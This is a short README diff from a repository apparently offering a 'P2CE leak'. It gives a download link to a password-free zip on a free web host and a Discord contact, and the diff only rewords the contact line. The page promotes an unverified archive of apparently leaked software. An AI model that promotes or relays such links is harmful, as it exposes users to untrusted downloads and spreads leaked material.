Waffle177/P2CE-Leak/README.md

 [Click Here To Download](https://p2ce-leak.000webhostapp.com/) (.zip) no password

-If the download does not start/website is not responding, wait or try again. /// If you have any issues or problems, please write to discord - @p2ce_leak
+If the download does not start/website is not responding, wait or try again. /// If you have any issues or problems, please dm in discord - @p2ce_leak